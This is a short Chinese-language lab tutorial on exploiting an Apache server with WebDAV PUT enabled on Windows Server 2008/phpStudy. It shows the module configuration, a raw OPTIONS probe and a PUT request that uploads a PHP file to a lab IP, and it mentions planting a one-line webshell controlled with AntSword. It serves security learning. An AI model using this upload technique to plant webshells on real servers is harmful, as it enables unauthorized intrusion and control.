实验环境
Window server 2008 +phpstudy
文章目录
第一章 文件上传的条件
- 实验环境
- 第一章 文件上传的条件
- 第二章window server2008开启telnet
- 第三章 Apache 开启PUT 方法
- 第一节 测试Apache 是否开启了put 方法
- 第二节 apache 开启put 方法操作
- 第一步 开启Dav
- 第二步 启用模块
- 第三步.开启文件锁
- 第四章文件上传案例
- 免责声明
Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web 用户可以访问);
Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web 目录都有执行权限。 要想完美利用文件上传漏洞,就是上传的文件可以执行,也就是Web 容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。 无视以上条件的情况就是服务器配置不当,开启了PUT 方法。
第二章window server2008开启telnet【https://blog.csdn.net/qq_41901122/article/details/102159506】 window2008开启telnet服务
第三章 Apache 开启PUT 方法 第一节 测试Apache 是否开启了put 方法telnet 192.168.139.136 80
----
OPTIONS / HTTP/1.1
HOST:172.16.132.161
----
1.开启模块 路径[C:\phpStudy\Apache\conf]
----
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
----
----
DavLockDB c:\phpstudy\www\DavLock
----
Telnet 192.168.139.136 80
----
PUT /infoa.php HTTP/1.1
HOST: 192.168.139.136
Content-Length: 18
----
尝试上传一句话木马–蚁剑链接 
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!
